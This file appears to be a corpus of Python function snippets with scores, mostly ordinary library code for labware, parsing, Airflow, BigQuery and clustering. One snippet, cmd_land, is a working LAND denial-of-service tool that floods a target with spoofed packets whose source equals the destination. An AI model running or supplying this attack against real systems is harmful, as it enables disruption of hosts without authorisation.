Columns: text (string, 78 to 104k characters); score (float64, range 0 to 0.18)
def wells(self, *args) -> List[Well]:
    """
    Accessor function used to generate a list of wells in top -> down,
    left -> right order. This is representative of moving down `rows` and
    across `columns` (e.g. 'A1', 'B1', 'C1'...'A2', 'B2', 'C2')

    With indexing one can treat it as a typical python list. To access well
    A1, for example, simply write: labware.wells()[0]

    Note that this method takes args for backward-compatibility, but use
    of args is deprecated and will be removed in future versions. Args
    can be either strings or integers, but must all be the same type
    (e.g.: `self.wells(1, 4, 8)` or `self.wells('A1', 'B2')`, but
    `self.wells('A1', 4)` is invalid).

    :return: Ordered list of all wells in a labware
    """
    if not args:
        res = self._wells
    elif isinstance(args[0], int):
        res = [self._wells[idx] for idx in args]
    elif isinstance(args[0], str):
        res = [self.wells_by_index()[idx] for idx in args]
    else:
        raise TypeError
    return res
0.001783
def get_strings(self, need_quote=False): """ret: string""" self.skip() if self.buf[0] == ';' or self.buf[0] == '{' or self.buf[0] == '}': error.err_add(self.errors, self.pos, 'EXPECTED_ARGUMENT', self.buf[0]) raise error.Abort if self.buf[0] == '"' or self.buf[0] == "'": # for double-quoted string, loop over string and translate # escaped characters. also strip leading whitespace as # necessary. # for single-quoted string, keep going until end quote is found. quote_char = self.buf[0] # collect output in strs (list of strings) strs = [] res = [] # remember position of " character indentpos = self.offset i = 1 while True: buflen = len(self.buf) start = i while i < buflen: if self.buf[i] == quote_char: # end-of-string; copy the buf to output res.append(self.buf[start:i]) strs.append((u''.join(res), quote_char)) # and trim buf self.set_buf(i+1) # check for '+' operator self.skip() if self.buf[0] == '+': self.set_buf(1) self.skip() nstrs = self.get_strings(need_quote=True) strs.extend(nstrs) return strs elif (quote_char == '"' and self.buf[i] == '\\' and i < (buflen-1)): # check for special characters special = None if self.buf[i+1] == 'n': special = '\n' elif self.buf[i+1] == 't': special = '\t' elif self.buf[i+1] == '\"': special = '\"' elif self.buf[i+1] == '\\': special = '\\' elif self.strict_quoting and self.is_1_1: error.err_add(self.errors, self.pos, 'ILLEGAL_ESCAPE', self.buf[i+1]) raise error.Abort elif self.strict_quoting: error.err_add(self.errors, self.pos, 'ILLEGAL_ESCAPE_WARN', self.buf[i+1]) if special != None: res.append(self.buf[start:i]) res.append(special) i = i + 1 start = i + 1 i = i + 1 # end-of-line # first strip trailing whitespace in double quoted strings # pre: self.buf[i-1] == '\n' if i > 2 and self.buf[i-2] == '\r': j = i - 3 else: j = i - 2 k = j while j >= 0 and self.buf[j].isspace(): j = j - 1 if j != k: # we found trailing whitespace s = self.buf[start:j+1] + self.buf[k+1:i] else: s = self.buf[start:i] res.append(s) self.readline() i = 0 if quote_char == '"': # skip whitespace used for indentation buflen = len(self.buf) while (i < buflen and self.buf[i].isspace() and i <= indentpos): i = i + 1 if i == buflen: # whitespace only on this line; keep it as is i = 0 elif need_quote == True: error.err_add(self.errors, self.pos, 'EXPECTED_QUOTED_STRING', ()) raise error.Abort else: # unquoted string buflen = len(self.buf) i = 0 while i < buflen: if (self.buf[i].isspace() or self.buf[i] == ';' or self.buf[i] == '{' or self.buf[i] == '}' or self.buf[i:i+2] == '//' or self.buf[i:i+2] == '/*' or self.buf[i:i+2] == '*/'): res = self.buf[:i] self.set_buf(i) return [(res, '')] i = i + 1
0.001284
def Record(self, value):
    """Records given value."""
    self.sum += value
    self.count += 1
    pos = bisect.bisect(self.bins, value) - 1
    if pos < 0:
        pos = 0
    elif pos == len(self.bins):
        pos = len(self.bins) - 1
    self.heights[pos] += 1
0.011321
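The Record method above clamps the bisect result so out-of-range values land in the edge bins. A minimal standalone sketch of that binning logic (the Hist class here is hypothetical; only the record logic is taken from the row above):

```python
import bisect

class Hist:
    def __init__(self, bins):
        self.bins = bins                  # sorted lower bin edges
        self.heights = [0] * len(bins)
        self.sum = 0
        self.count = 0

    def record(self, value):
        self.sum += value
        self.count += 1
        # bisect gives the insertion point; minus 1 is the bin whose
        # lower edge is <= value; clamp anything below the first edge
        pos = max(bisect.bisect(self.bins, value) - 1, 0)
        self.heights[pos] += 1

h = Hist([0, 10, 20])
for v in (3, 12, 25, -1):
    h.record(v)
print(h.heights)  # [2, 1, 1]
```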
def dump_stats(self, pattern):
    """Dumps VM statistics.

    in pattern of type str
        The selection pattern. A bit similar to filename globbing.
    """
    if not isinstance(pattern, basestring):
        raise TypeError("pattern can only be an instance of type basestring")
    self._call("dumpStats", in_p=[pattern])
0.01061
def node_path_to_child(self, node): """Return a list describing the path from this node to a child node If *node* is not a (grand)child of this node, then raise RuntimeError. Parameters ---------- node : instance of Node The child node. Returns ------- path : list | None The path. """ if node is self: return [] # Go up from the child node as far as we can path1 = [node] child = node while child.parent is not None: child = child.parent path1.append(child) # Early exit if child is self: return list(reversed(path1)) # Verify that we're not cut off if path1[-1].parent is None: raise RuntimeError('%r is not a child of %r' % (node, self)) def _is_child(path, parent, child): path.append(parent) if child in parent.children: return path else: for c in parent.children: possible_path = _is_child(path[:], c, child) if possible_path: return possible_path return None # Search from the parent towards the child path2 = _is_child([], self, path1[-1]) if not path2: raise RuntimeError('%r is not a child of %r' % (node, self)) # Return return path2 + list(reversed(path1))
0.002604
def MakeSuiteFromHist(hist, name=None):
    """Makes a normalized suite from a Hist object.

    Args:
        hist: Hist object
        name: string name

    Returns:
        Suite object
    """
    if name is None:
        name = hist.name
    # make a copy of the dictionary
    d = dict(hist.GetDict())
    return MakeSuiteFromDict(d, name)
0.002882
def _move_focused_item_into_viewport(self, view, focused_item):
    """Called when an item is focused, moves the item into the viewport

    :param view:
    :param StateView | ConnectionView | PortView focused_item: The focused item
    """
    self.view.editor.handler_block(self.drag_motion_handler_id)
    self.move_item_into_viewport(focused_item)
    self.view.editor.handler_unblock(self.drag_motion_handler_id)
0.006726
def ADC(cpu, dest, src): """ Adds with carry. Adds the destination operand (first operand), the source operand (second operand), and the carry (CF) flag and stores the result in the destination operand. The state of the CF flag represents a carry from a previous addition. When an immediate value is used as an operand, it is sign-extended to the length of the destination operand format. The ADC instruction does not distinguish between signed or unsigned operands. Instead, the processor evaluates the result for both data types and sets the OF and CF flags to indicate a carry in the signed or unsigned result, respectively. The SF flag indicates the sign of the signed result. The ADC instruction is usually executed as part of a multibyte or multiword addition in which an ADD instruction is followed by an ADC instruction:: DEST = DEST + SRC + CF; The OF, SF, ZF, AF, CF, and PF flags are set according to the result. :param cpu: current CPU. :param dest: destination operand. :param src: source operand. """ cpu._ADD(dest, src, carry=True)
0.009076
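The ADC docstring above reduces the instruction to DEST = DEST + SRC + CF. A toy pure-Python version of that formula, illustrative only (not Manticore's implementation, which delegates to _ADD and also sets OF/SF/ZF/AF/PF):

```python
def adc(dest, src, cf, width=8):
    """Add with carry, modulo 2**width; returns (result, carry-out)."""
    mask = (1 << width) - 1
    total = (dest & mask) + (src & mask) + (cf & 1)
    return total & mask, int(total > mask)

print(adc(0xFF, 0x01, 0))  # (0, 1): the sum wraps and sets CF
```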
def clean_time(sltime, in_format='%Y-%m-%dT%H:%M:%S%z', out_format='%Y-%m-%d %H:%M'):
    """Easy way to format time strings

    :param string sltime: A softlayer formatted time string
    :param string in_format: Datetime format for strptime
    :param string out_format: Datetime format for strftime
    """
    try:
        clean = datetime.datetime.strptime(sltime, in_format)
        return clean.strftime(out_format)
    # The %z option only exists with py3.6+
    except ValueError:
        return sltime
0.003906
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, which sends packets whose
    forged source IP address is the same as the destination IP. It also uses
    the same source and destination port.

    The attack is very old and can be used to cause a denial of service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many packets to
    send with the '-c' option. The default is to never stop. Also, you can
    specify the destination port with the '-p' option.
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
0.000843
def applyCommand(self): """ Applies the current line of code as an interactive python command. """ # generate the command information cursor = self.textCursor() cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) at_end = cursor.atEnd() modifiers = QApplication.instance().keyboardModifiers() mod_mode = at_end or modifiers == Qt.ShiftModifier # test the line for information if mod_mode and line.endswith(':'): cursor.movePosition(cursor.EndOfLine) line = re.sub('^>>> ', '', line) line = re.sub('^\.\.\. ', '', line) count = len(line) - len(line.lstrip()) + 4 self.insertPlainText('\n... ' + count * ' ') return False elif mod_mode and line.startswith('...') and \ (line.strip() != '...' or not at_end): cursor.movePosition(cursor.EndOfLine) line = re.sub('^\.\.\. ', '', line) count = len(line) - len(line.lstrip()) self.insertPlainText('\n... ' + count * ' ') return False # if we're not at the end of the console, then add it to the end elif line.startswith('>>>') or line.startswith('...'): # move to the top of the command structure line = projex.text.nativestring(cursor.block().text()) while line.startswith('...'): cursor.movePosition(cursor.PreviousBlock) line = projex.text.nativestring(cursor.block().text()) # calculate the command cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) ended = False lines = [] while True: # add the new block lines.append(line) if cursor.atEnd(): ended = True break # move to the next line cursor.movePosition(cursor.NextBlock) cursor.movePosition(cursor.EndOfLine) line = projex.text.nativestring(cursor.block().text()) # check for a new command or the end of the command if not line.startswith('...'): break command = '\n'.join(lines) # if we did not end up at the end of the command block, then # copy it for modification if not (ended and command): self.waitForInput() self.insertPlainText(command.replace('>>> ', '')) cursor.movePosition(cursor.End) return False else: self.waitForInput() return False self.executeCommand(command) return True
0.009542
def to_pandas(self, wrap=False, **kwargs): """ Convert to pandas DataFrame. Execute at once. :param wrap: if True, wrap the pandas DataFrame into a PyODPS DataFrame :return: pandas DataFrame """ try: import pandas as pd except ImportError: raise DependencyNotInstalledError( 'to_pandas requires `pandas` library') def wrapper(result): res = result.values if wrap: from .. import DataFrame return DataFrame(res, schema=self.schema) return res return self.execute(wrapper=wrapper, **kwargs)
0.002959
def find_card_bundles(provider: Provider, deck: Deck) -> Optional[Iterator]: '''each blockchain transaction can contain multiple cards, wrapped in bundles. This method finds and returns those bundles.''' if isinstance(provider, RpcNode): if deck.id is None: raise Exception("deck.id required to listtransactions") p2th_account = provider.getaccount(deck.p2th_address) batch_data = [('getrawtransaction', [i["txid"], 1]) for i in provider.listtransactions(p2th_account)] result = provider.batch(batch_data) if result is not None: raw_txns = [i['result'] for i in result if result] else: raise EmptyP2THDirectory({'error': 'No cards found on this deck.'}) else: if deck.p2th_address is None: raise Exception("deck.p2th_address required to listtransactions") try: raw_txns = (provider.getrawtransaction(i, 1) for i in provider.listtransactions(deck.p2th_address)) except TypeError: raise EmptyP2THDirectory({'error': 'No cards found on this deck.'}) return (card_bundler(provider, deck, i) for i in raw_txns)
0.000816
def fetch_recent_submissions(self, max_duration): """Fetch recent submissions in subreddit with boundaries. Does not include posts within the last day as their scores may not be representative. :param max_duration: When set, specifies the number of days to include """ if max_duration: self.min_date = self.max_date - SECONDS_IN_A_DAY * max_duration for submission in self.subreddit.new(limit=None): if submission.created_utc <= self.min_date: break if submission.created_utc > self.max_date: continue self.submissions[submission.id] = MiniSubmission(submission)
0.002853
def get_cell_length(flow_model):
    """Get flow direction induced cell length dict.

    Args:
        flow_model: Currently, "TauDEM", "ArcGIS", and "Whitebox" are supported.
    """
    assert flow_model.lower() in FlowModelConst.d8_lens
    return FlowModelConst.d8_lens.get(flow_model.lower())
0.009346
def gammatone_erb_constants(n): """ Constants for using the real bandwidth in the gammatone filter, given its order. Returns a pair :math:`(x, y) = (1/a_n, c_n)`. Based on equations from: ``Holdsworth, J.; Patterson, R.; Nimmo-Smith, I.; Rice, P. Implementing a GammaTone Filter Bank. In: SVOS Final Report, Annex C, Part A: The Auditory Filter Bank. 1988.`` First returned value is a bandwidth compensation for direct use in the gammatone formula: >>> x, y = gammatone_erb_constants(4) >>> central_frequency = 1000 >>> round(x, 3) 1.019 >>> bandwidth = x * erb["moore_glasberg_83"](central_frequency) >>> round(bandwidth, 2) 130.52 Second returned value helps us find the ``3 dB`` bandwidth as: >>> x, y = gammatone_erb_constants(4) >>> central_frequency = 1000 >>> bandwidth3dB = x * y * erb["moore_glasberg_83"](central_frequency) >>> round(bandwidth3dB, 2) 113.55 """ tnt = 2 * n - 2 return (factorial(n - 1) ** 2 / (pi * factorial(tnt) * 2 ** -tnt), 2 * (2 ** (1. / n) - 1) ** .5 )
0.004682
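The gammatone row's doctest for the first constant can be checked with a standalone version of the pair; this sketch drops the erb bandwidth lookup (not defined here) and keeps only the closed-form constants:

```python
from math import factorial, pi

def gammatone_erb_constants(n):
    """Return (x, y) = (1/a_n, c_n) for an order-n gammatone filter."""
    tnt = 2 * n - 2
    x = factorial(n - 1) ** 2 / (pi * factorial(tnt) * 2 ** -tnt)
    y = 2 * (2 ** (1. / n) - 1) ** .5
    return x, y

x, y = gammatone_erb_constants(4)
print(round(x, 3))  # 1.019, the bandwidth correction factor from the doctest
```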
def getProvince(self, default=None):
    """Return the Province from the Physical or Postal Address
    """
    physical_address = self.getPhysicalAddress().get("state", default)
    postal_address = self.getPostalAddress().get("state", default)
    return physical_address or postal_address
0.006431
def recover(self,runAsync=False): """ If the shared configuration store for a site is unavailable, a site in read-only mode will operate in a degraded capacity that allows access to the ArcGIS Server Administrator Directory. You can recover a site if the shared configuration store is permanently lost. The site must be in read-only mode, and the site configuration files must have been copied to the local repository when switching site modes. The recover operation will copy the configuration store from the local repository into the shared configuration store location. The copied local repository will be from the machine in the site where the recover operation is performed. Inputs: runAsync - default False - Decides if this operation must run asynchronously. """ url = self._url + "/recover" params = { "f" : "json", "runAsync" : runAsync } return self._post(url=url, param_dict=params, securityHandler=self._securityHandler, proxy_url=self._proxy_url, proxy_port=self._proxy_port)
0.003922
def JR(self, **kwargs):
    """
    NAME:
       JR
    PURPOSE:
       Calculate the radial action
    INPUT:
       +scipy.integrate.quad keywords
    OUTPUT:
       J_R(R,vR,vT)/ro/vc + estimate of the error
    HISTORY:
       2010-12-01 - Written - Bovy (NYU)
    """
    if hasattr(self, '_JR'):  # pragma: no cover
        return self._JR
    (rperi, rap) = self.calcRapRperi(**kwargs)
    EL = self.calcEL(**kwargs)
    E, L = EL
    self._JR = 1. / nu.pi * integrate.quad(_JRAxiIntegrand, rperi, rap,
                                           args=(E, L, self._pot),
                                           **kwargs)[0]
    return self._JR
0.021157
def meta_select(self, predicate=None, semiJoinDataset=None, semiJoinMeta=None): """ *Wrapper of* ``SELECT`` Wrapper of the :meth:`~.select` function filtering samples only based on metadata. :param predicate: logical predicate on the values of the rows :param semiJoinDataset: an other GMQLDataset :param semiJoinMeta: a list of metadata :return: a new GMQLDataset Example 1:: output_dataset = dataset.meta_select(dataset['patient_age'] < 70) # This statement can be written also as output_dataset = dataset[ dataset['patient_age'] < 70 ] Example 2:: output_dataset = dataset.meta_select( (dataset['tissue_status'] == 'tumoral') & (tumor_tag != 'gbm') | (tumor_tag == 'brca')) # This statement can be written also as output_dataset = dataset[ (dataset['tissue_status'] == 'tumoral') & (tumor_tag != 'gbm') | (tumor_tag == 'brca') ] Example 3:: JUN_POLR2A_TF = HG19_ENCODE_NARROW.meta_select( JUN_POLR2A_TF['antibody_target'] == 'JUN', semiJoinDataset=POLR2A_TF, semiJoinMeta=['cell']) The meta selection predicate can use all the classical equalities and disequalities {>, <, >=, <=, ==, !=} and predicates can be connected by the classical logical symbols {& (AND), | (OR), ~ (NOT)} plus the *isin* function. """ return self.select(meta_predicate=predicate, semiJoinDataset=semiJoinDataset, semiJoinMeta=semiJoinMeta)
0.00826
def supports_heading_type(self, heading_type): """Tests if the given heading type is supported. arg: heading_type (osid.type.Type): a heading Type return: (boolean) - ``true`` if the type is supported, ``false`` otherwise raise: IllegalState - syntax is not a ``HEADING`` raise: NullArgument - ``heading_type`` is ``null`` *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for osid.Metadata.supports_coordinate_type if self._kwargs['syntax'] not in ['``HEADING``']: raise errors.IllegalState() return heading_type in self.get_heading_types
0.002874
def match_files(files, pattern: Pattern):
    """Yields file name if matches a regular expression pattern."""
    for name in files:
        if re.match(pattern, name):
            yield name
0.005208
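A quick runnable check of match_files (the generator is repeated from the row above so the sketch stands alone); note that re.match anchors the pattern at the start of each name:

```python
import re

def match_files(files, pattern):
    for name in files:
        if re.match(pattern, name):
            yield name

names = ['setup.py', 'README.md', 'test_api.py', 'api.py']
print(list(match_files(names, r'test_.*\.py$')))  # ['test_api.py']
```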
async def pong(self, message: bytes = b'') -> None:
    """Send pong message."""
    if isinstance(message, str):
        message = message.encode('utf-8')
    await self._send_frame(message, WSMsgType.PONG)
0.0181
def join(self, join_streamlet, window_config, join_function): """Return a new Streamlet by joining join_streamlet with this streamlet """ from heronpy.streamlet.impl.joinbolt import JoinStreamlet, JoinBolt join_streamlet_result = JoinStreamlet(JoinBolt.INNER, window_config, join_function, self, join_streamlet) self._add_child(join_streamlet_result) join_streamlet._add_child(join_streamlet_result) return join_streamlet_result
0.002008
def handle_options(tool, condition, command, options):
    """
    Handle common options for toolset, specifically sets the following
    flag variables:
    - CONFIG_COMMAND to 'command'
    - OPTIONS for compile to the value of <compileflags> in options
    - OPTIONS for compile.c to the value of <cflags> in options
    - OPTIONS for compile.c++ to the value of <cxxflags> in options
    - OPTIONS for compile.fortran to the value of <fflags> in options
    - OPTIONS for link to the value of <linkflags> in options
    """
    from b2.build import toolset
    assert isinstance(tool, basestring)
    assert is_iterable_typed(condition, basestring)
    assert command and isinstance(command, basestring)
    assert is_iterable_typed(options, basestring)
    toolset.flags(tool, 'CONFIG_COMMAND', condition, [command])
    toolset.flags(tool + '.compile', 'OPTIONS', condition,
                  feature.get_values('<compileflags>', options))
    toolset.flags(tool + '.compile.c', 'OPTIONS', condition,
                  feature.get_values('<cflags>', options))
    toolset.flags(tool + '.compile.c++', 'OPTIONS', condition,
                  feature.get_values('<cxxflags>', options))
    toolset.flags(tool + '.compile.fortran', 'OPTIONS', condition,
                  feature.get_values('<fflags>', options))
    toolset.flags(tool + '.link', 'OPTIONS', condition,
                  feature.get_values('<linkflags>', options))
0.004386
def set_sail(self, angle):
    '''
    Set the angle of the sail to `angle` degrees

    :param angle: sail angle
    :type angle: float between -90 and 90
    '''
    angle = float(angle)
    request = self.boatd.post({'value': float(angle)}, '/sail')
    return request.get('result')
0.006309
def set_state(task, execution_date, upstream=False, downstream=False,
              future=False, past=False, state=State.SUCCESS, commit=False,
              session=None):
    """
    Set the state of a task instance and if needed its relatives. Can set
    state for future tasks (calculated from execution_date) and retroactively
    for past tasks. Will verify integrity of past dag runs in order to create
    tasks that did not exist. It will not create dag runs that are missing
    on the schedule (but it will for subdag dag runs if needed).

    :param task: the task from which to work. task.task.dag needs to be set
    :param execution_date: the execution date from which to start looking
    :param upstream: Mark all parents (upstream tasks)
    :param downstream: Mark all siblings (downstream tasks) of task_id,
        including SubDags
    :param future: Mark all future tasks on the interval of the dag up until
        last execution date.
    :param past: Retroactively mark all tasks starting from start_date of the DAG
    :param state: State to which the tasks need to be set
    :param commit: Commit tasks to be altered to the database
    :param session: database session
    :return: list of tasks that have been created and updated
    """
    assert timezone.is_localized(execution_date)

    assert task.dag is not None
    dag = task.dag

    latest_execution_date = dag.latest_execution_date
    assert latest_execution_date is not None

    # determine date range of dag runs and tasks to consider
    end_date = latest_execution_date if future else execution_date

    if 'start_date' in dag.default_args:
        start_date = dag.default_args['start_date']
    elif dag.start_date:
        start_date = dag.start_date
    else:
        start_date = execution_date

    start_date = execution_date if not past else start_date

    if dag.schedule_interval == '@once':
        dates = [start_date]
    else:
        dates = dag.date_range(start_date=start_date, end_date=end_date)

    # find relatives (siblings = downstream, parents = upstream) if needed
    task_ids = [task.task_id]
    if downstream:
        relatives = task.get_flat_relatives(upstream=False)
        task_ids += [t.task_id for t in relatives]
    if upstream:
        relatives = task.get_flat_relatives(upstream=True)
        task_ids += [t.task_id for t in relatives]

    # verify the integrity of the dag runs in case a task was added or removed
    # set the confirmed execution dates as they might be different
    # from what was provided
    confirmed_dates = []
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=dates)
    for dr in drs:
        dr.dag = dag
        dr.verify_integrity()
        confirmed_dates.append(dr.execution_date)

    # go through subdagoperators and create dag runs. We will only work
    # within the scope of the subdag. We won't propagate to the parent dag,
    # but we will propagate from parent to subdag.
    dags = [dag]
    sub_dag_ids = []
    while len(dags) > 0:
        current_dag = dags.pop()
        for task_id in task_ids:
            if not current_dag.has_task(task_id):
                continue

            current_task = current_dag.get_task(task_id)
            if isinstance(current_task, SubDagOperator):
                # this works as a kind of integrity check
                # it creates missing dag runs for subdagoperators,
                # maybe this should be moved to dagrun.verify_integrity
                drs = _create_dagruns(current_task.subdag,
                                      execution_dates=confirmed_dates,
                                      state=State.RUNNING,
                                      run_id_template=BackfillJob.ID_FORMAT_PREFIX)

                for dr in drs:
                    dr.dag = current_task.subdag
                    dr.verify_integrity()
                    if commit:
                        dr.state = state
                        session.merge(dr)

                dags.append(current_task.subdag)
                sub_dag_ids.append(current_task.subdag.dag_id)

    # now look for the task instances that are affected
    TI = TaskInstance

    # get all tasks of the main dag that will be affected by a state change
    qry_dag = session.query(TI).filter(
        TI.dag_id == dag.dag_id,
        TI.execution_date.in_(confirmed_dates),
        TI.task_id.in_(task_ids)).filter(
        or_(TI.state.is_(None),
            TI.state != state)
    )

    # get *all* tasks of the sub dags
    if len(sub_dag_ids) > 0:
        qry_sub_dag = session.query(TI).filter(
            TI.dag_id.in_(sub_dag_ids),
            TI.execution_date.in_(confirmed_dates)).filter(
            or_(TI.state.is_(None),
                TI.state != state)
        )

    if commit:
        tis_altered = qry_dag.with_for_update().all()
        if len(sub_dag_ids) > 0:
            tis_altered += qry_sub_dag.with_for_update().all()
        for ti in tis_altered:
            ti.state = state
    else:
        tis_altered = qry_dag.all()
        if len(sub_dag_ids) > 0:
            tis_altered += qry_sub_dag.all()

    return tis_altered
0.000973
def sign(self, pairs): """ Generate a signature for a sequence of (key, value) pairs @param pairs: The pairs to sign, in order @type pairs: sequence of (str, str) @return: The binary signature of this sequence of pairs @rtype: str """ kv = kvform.seqToKV(pairs) try: mac = self._macs[self.assoc_type] except KeyError: raise ValueError( 'Unknown association type: %r' % (self.assoc_type,)) return mac(self.secret, kv)
0.003623
def get_jobs_url(self, job_id): # type: (Text) -> Text """ Returns the URL to check job status. :param job_id: The ID of the job to check. """ return compat.urllib_parse.urlunsplit(( self.uri.scheme, self.uri.netloc, self.uri.path.rstrip('/') + '/jobs/' + job_id, self.uri.query, self.uri.fragment, ))
0.006977
def cli(env, identifier, count): """Get details for a ticket.""" mgr = SoftLayer.TicketManager(env.client) ticket_id = helpers.resolve_id(mgr.resolve_ids, identifier, 'ticket') env.fout(ticket.get_ticket_results(mgr, ticket_id, update_count=count))
0.003759
def disable(self, clear_cache=True):
    """
    Disable the cache and clear its contents

    :param clear_cache: clear the cache contents as well as disabling
        (defaults to True)
    """
    logger.debug('disable(clear_cache={})'.format(clear_cache))
    if clear_cache:
        self.clear()
    self.options.enabled = False
    logger.info('cache disabled')
0.007595
def fileSave(self, filePath=None, updatePath=False): """Write the internal JSON data dictionary to a JSON data file. If no file path is provided, the stored data file path will be used. Args: filePath (Optional[str]): A relative or absolute path to a '.json' file. Defaults to None. updatePath (Optional[bool]): Specifies whether or not to update the stored data file path. Defaults to False. """ if not filePath: filePath = self.filePath if not os.path.isfile(filePath): print("Data file '%s' does not exist, will create new file." % (filePath)) if not os.path.exists(os.path.split(filePath)[0]): os.makedirs(os.path.split(filePath)[0]) dataJsonString = json.dumps(self.data, indent=4, sort_keys=True) print("Writing to file '%s' ... " % (filePath), end="", flush=True) with open(filePath, "w") as fileout: fileout.write(dataJsonString) print("Wrote file!") if updatePath: self.filePath = filePath
0.002676
def pfxdtag(tag):
    """
    Return short-form prefixed tag from fully qualified (Clark notation)
    tagname.
    """
    uri, tagroot = tag[1:].split('}')
    prefix = reverse_nsmap[uri]
    return '%s:%s' % (prefix, tagroot)
0.004386
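pfxdtag relies on a module-level reverse_nsmap; a runnable sketch with a hypothetical single-entry map:

```python
# Hypothetical namespace map; the real module builds reverse_nsmap elsewhere.
reverse_nsmap = {'http://www.w3.org/XML/1998/namespace': 'xml'}

def pfxdtag(tag):
    """'{uri}local' (Clark notation) -> 'prefix:local'."""
    uri, tagroot = tag[1:].split('}')
    return '%s:%s' % (reverse_nsmap[uri], tagroot)

print(pfxdtag('{http://www.w3.org/XML/1998/namespace}lang'))  # xml:lang
```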
def new_value(self, key, value):
    """Create new value in data"""
    data = self.model.get_data()
    data[key] = value
    self.set_data(data)
0.012048
def log(level, message):
    """
    Publish `message` with the `level` to the redis `channel`.

    :param level: the level of the message
    :param message: the message you want to log
    """
    if redis_instance is None:
        __connect()

    if level not in __error_levels:
        raise InvalidErrorLevel('You have used an invalid error level. '
                                'Please choose from: ' + ', '.join(__error_levels))

    if channel is None:
        raise NoChannelError('Please set a channel.')

    c = '{channel}.{level}'.format(channel=channel, level=level)
    redis_instance.publish(c, message)
0.001667
def send_left(self, count):
    """
    Sends the given number of left key presses.
    """
    for _ in range(count):
        self.interface.send_key(Key.LEFT)
0.011111
def add_to_archive(self, spec): ''' Add files and commands to archive Use InsightsSpec.get_output() to get data ''' if isinstance(spec, InsightsCommand): archive_path = os.path.join(self.cmd_dir, spec.archive_path.lstrip('/')) if isinstance(spec, InsightsFile): archive_path = self.get_full_archive_path(spec.archive_path.lstrip('/')) output = spec.get_output() if output: write_data_to_file(output, archive_path)
0.007797
def read_rows( self, read_position, retry=google.api_core.gapic_v1.method.DEFAULT, timeout=google.api_core.gapic_v1.method.DEFAULT, metadata=None, ): """ Reads rows from the table in the format prescribed by the read session. Each response contains one or more table rows, up to a maximum of 10 MiB per response; read requests which attempt to read individual rows larger than this will fail. Each request also returns a set of stream statistics reflecting the estimated total number of rows in the read stream. This number is computed based on the total table size and the number of active streams in the read session, and may change as other streams continue to read data. Example: >>> from google.cloud import bigquery_storage_v1beta1 >>> >>> client = bigquery_storage_v1beta1.BigQueryStorageClient() >>> >>> # TODO: Initialize ``table_reference``: >>> table_reference = { ... 'project_id': 'your-data-project-id', ... 'dataset_id': 'your_dataset_id', ... 'table_id': 'your_table_id', ... } >>> >>> # TODO: Initialize `parent`: >>> parent = 'projects/your-billing-project-id' >>> >>> session = client.create_read_session(table_reference, parent) >>> read_position = bigquery_storage_v1beta1.types.StreamPosition( ... stream=session.streams[0], # TODO: Read the other streams. ... ) >>> >>> for element in client.read_rows(read_position): ... # process element ... pass Args: read_position (Union[ \ dict, \ ~google.cloud.bigquery_storage_v1beta1.types.StreamPosition \ ]): Required. Identifier of the position in the stream to start reading from. The offset requested must be less than the last row read from ReadRows. Requesting a larger offset is undefined. If a dict is provided, it must be of the same form as the protobuf message :class:`~google.cloud.bigquery_storage_v1beta1.types.StreamPosition` retry (Optional[google.api_core.retry.Retry]): A retry object used to retry requests. If ``None`` is specified, requests will not be retried. timeout (Optional[float]): The amount of time, in seconds, to wait for the request to complete. Note that if ``retry`` is specified, the timeout applies to each individual attempt. metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata that is provided to the method. Returns: ~google.cloud.bigquery_storage_v1beta1.reader.ReadRowsStream: An iterable of :class:`~google.cloud.bigquery_storage_v1beta1.types.ReadRowsResponse`. Raises: google.api_core.exceptions.GoogleAPICallError: If the request failed for any reason. google.api_core.exceptions.RetryError: If the request failed due to a retryable error and retry attempts failed. ValueError: If the parameters are invalid. """ gapic_client = super(BigQueryStorageClient, self) stream = gapic_client.read_rows( read_position, retry=retry, timeout=timeout, metadata=metadata ) return reader.ReadRowsStream( stream, gapic_client, read_position, {"retry": retry, "timeout": timeout, "metadata": metadata}, )
0.000776
def allocate_sync_ensembles(dynamic, tolerance = 0.1, threshold = 1.0, ignore = None): """! @brief Allocate clusters in line with ensembles of synchronous oscillators where each synchronous ensemble corresponds to only one cluster. @param[in] dynamic (dynamic): Dynamic of each oscillator. @param[in] tolerance (double): Maximum error for allocation of synchronous ensemble oscillators. @param[in] threshold (double): Amlitude trigger when spike is taken into account. @param[in] ignore (bool): Set of indexes that shouldn't be taken into account. @return (list) Grours (lists) of indexes of synchronous oscillators, for example, [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ]. """ descriptors = [ [] for _ in range(len(dynamic[0])) ]; # Check from the end for obtaining result for index_dyn in range(0, len(dynamic[0]), 1): if ((ignore is not None) and (index_dyn in ignore)): continue; time_stop_simulation = len(dynamic) - 1; active_state = False; if (dynamic[time_stop_simulation][index_dyn] > threshold): active_state = True; # if active state is detected, it means we don't have whole oscillatory period for the considered oscillator, should be skipped. if (active_state is True): while ( (dynamic[time_stop_simulation][index_dyn] > threshold) and (time_stop_simulation > 0) ): time_stop_simulation -= 1; # if there are no any oscillation than let's consider it like noise if (time_stop_simulation == 0): continue; # reset active_state = False; desc = [0, 0, 0]; # end, start, average time of oscillation for t in range(time_stop_simulation, 0, -1): if ( (dynamic[t][index_dyn] > threshold) and (active_state is False) ): desc[0] = t; active_state = True; elif ( (dynamic[t][index_dyn] < threshold) and (active_state is True) ): desc[1] = t; active_state = False; break; if (desc == [0, 0, 0]): continue; desc[2] = desc[1] + (desc[0] - desc[1]) / 2.0; descriptors[index_dyn] = desc; # Cluster allocation sync_ensembles = []; desc_sync_ensembles = []; for index_desc in range(0, len(descriptors), 1): if (descriptors[index_desc] == []): continue; if (len(sync_ensembles) == 0): desc_ensemble = descriptors[index_desc]; 